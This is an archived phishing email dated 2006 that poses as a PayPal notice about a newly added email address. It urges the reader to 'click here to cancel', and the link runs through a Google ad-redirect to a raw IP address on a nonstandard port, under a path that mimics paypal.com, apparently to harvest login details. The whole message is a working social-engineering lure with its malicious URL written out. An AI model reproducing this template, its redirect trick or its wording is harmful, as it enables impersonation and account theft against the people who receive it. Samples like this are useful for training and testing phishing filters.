Subject: Verify Your email Address

From: "PayPal" <[email-masked]>
Date: Mon, 7 Aug 2006 10:50:48 -0400

<HTML>
<HEAD>
<xmeta NAME="GENERATOR" Content="Microsoft DHTML Editing Control">
<TITLE></TITLE>
</HEAD><br><br>
<xbody>
<P><FONT face="Courier New" size="2">You have added <A target="_blank"

<FONT face="Courier New" size="2"> [email-masked] </A> as a
new email address for<br> your
PayPal account.<br></p></FONT>
<P><FONT face="Courier New" size="2">If you did not authorize this change
, or feel there is an error made ,<br/><br/>
<P><FONT face="Courier New" size="2"><A target="_blank"<br><br/><table
align="" bgcolor="#FFE65C" border="0" cellpadding="1" cellspacing="0"
width="400"><tr><td><table align="center" bgcolor="#FFFECD" border="0"
cellpadding="4" cellspacing="0" width="100%"><tr><td align="center"
class="sansSerif"><a target="_parent"
href="http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q-fXBJGSiQLU0eDSAueHkArnhtWZAu-FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&adurl=http://212.12.177.170:9999/www.paypal.com/addyouremail/webscrr/index.php">Click
here to cancel your new email address</a></td></tr></table></td></tr></table><br/><br/><p/></A><br></p></FONT>
<P><FONT face="Courier New" size="2">If this change was initiated by you ,
<br> the new email address will be set as primary within 3 working days .
<P><FONT face="Courier New" size="2">Thank you for using
PayPal!<br></xbody>
The PayPal Team .</p></FONT><br>